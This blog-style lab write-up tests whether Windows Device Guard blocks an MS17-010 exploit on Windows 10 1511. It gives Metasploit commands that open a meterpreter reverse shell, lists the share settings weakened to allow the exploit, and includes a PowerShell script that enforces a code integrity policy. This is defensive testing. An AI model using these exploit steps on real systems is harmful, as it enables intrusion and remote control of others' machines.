WDAC (Device Guard) vs RCE
Applocker failed to prevent a Remote Code Exploit (here), so let's see if Device Guard does any better...
The tests will be carried out in isolation, all other security protections will be disabled. The only service protecting Windows from being pillaged is Device Guard. Microsoft seems to be going out of its way to prevent RCE's executing against Windows 10. After a few days of research and trialling, the only remote exploit that successfully works without requiring credentials is Windows 10 1511 using MS17-010. Slightly disappointing as I was hoping to use 2020-0796 and 1903 or 1909. 2020-0796 is still POC and with my setup, it appears to produce lots of BSoD.
Using Windows 10 1511 is a bit of a concern as Device Guard is upgraded with Windows 10 1703 (Creators). RCE's may be able to bypass 1511 but not 1703 and onwards, but the test wouldn't reflect that.
The attacker is Kali on 192.168.0.65 running MS17_010_PSExec
The victim is Windows 10 x64 1511 on 192.168.0.15 running on Asus Zenbook 301
To exploit using MS17_010_PSExec without providing credentials:
'Restrict anonymous access to named pipes and shares' was disabled
'Shares that can be accessed anonymously' has Admin$ added
In Kali start 'msfconsole'
use exploit/windows/smb/ms17_010_psexec
set rhost 192.168.0.65
set lhost 192.168.0.15
set payload windows/meterpreter/reverse_tcp
exploit
To easy and the now the proud owner of the Zenbook.
Device Guard has the following requirements:
Hardware Requirements
UEFI Native Mode
Windows 10/2016 x64
SLAT and Virtualization Extensions (Intel VT or AMD V)
TPM
Windows Features
Windows Defender Application Guard (Isolation mode prior to 1703)
Hyper-V Platform (Not required after 1603)
Hyper-V Hypervisor
GPO Settings
Computer Configuration > Administrative Templates > System > Device Guard
Turn on Virtualization Based Security (enable)
Secure Boot and DMA Protection
Enable Virtualization Based Protection of Code
Deploy Code Integrity Policy (enable)
C:\DeviceGuard\SIPolicy.p7b
(C:\DeviceGuard\SIPolicy.p7b is automatically copied and converted to C:\Windows\System32\Codeintegrity\)
To force the conversion run the following: Invoke-CimMethod -Namespace root/Microsoft/Windows/CI -ClassName PS_UpdateAndCompareCIPolicy -MethodName update -Arguments @{filepath = "C:\DeviceGuard\SIPolicy.p7b"}
The system will create SIPolicy.p7b and a reboot will enforce Device Guard
<#
.Synopsis
.Description
.Version
#>
#Enable required Hypervisor feature
#Enable all features and then remove unwanted. Unable to add Hyper-V Hypervisor as Hyper-V platform is required
Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-All -NoRestart
Disable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-Tools-All -NoRestart
Disable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-Services -NoRestart
#Sets Working Folder for DG
$CIPolicyPath = "C:\DeviceGuard"
#C:\DeviceGuard\InitalScan.xml
$IntialCIPolicy = $CIPolicyPath+"\initialScan.xml"
#C:\DeviceGuard\SIPolicy.p7b
$CIPolicyBin = $CIPolicyPath+"\SIPolicy.p7b"
#C:\DeviceGuard\CIPolicy.txt - Output from initial policy audit
$CIPolicyError = $CIPolicyPath+"\CIPolicy.txt"
#Creates SIPolicy.p7b based on the IntialCIPolicy.xml
New-CIPolicy -Level Publisher -Fallback Hash -FilePath $IntialCIPolicy -UserPEs 3> $CIPolicyError
#Enforces UMCI
Set-RuleOption -FilePath $IntialCIPolicy -Option 0
#Enforcement Mode enabled
Set-RuleOption -FilePath $IntialCIPolicy -Option 3 -delete
#Converts the faudit to a p7b file copies to C:\DeviceGuard\
#GPO is set to move SIPolicy.p7b to C:\Windows\System32\CodeIntegrity
ConvertFrom-CIPolicy -XmlFilePath $IntialCIPolicy -BinaryFilePath $CIPolicyBin
#Applies DG policy without a reboot
Invoke-CimMethod -Namespace root/Microsoft/Windows/CI -ClassName PS_UpdateAndCompareCIPolicy -MethodName update -Arguments @{filepath = "C:\Windows\System32\CodeIntegrity\SIPolicy.p7b"}
The script can be downloaded from Github (here).
Run GPUpdate and reboot
To test Device Guard I attempted to run putty.exe and a few other applications, any exe not present during the audit wouldn't successfully run.
The CodeIntegrity Eventlogs reported that the programs were not approved
And now for the Remote Code Exploit..........
The good news is that Device Guard prevented the exploit on repeated attempts, that's a good day at the office, the system is safe and the attacker frustrated.
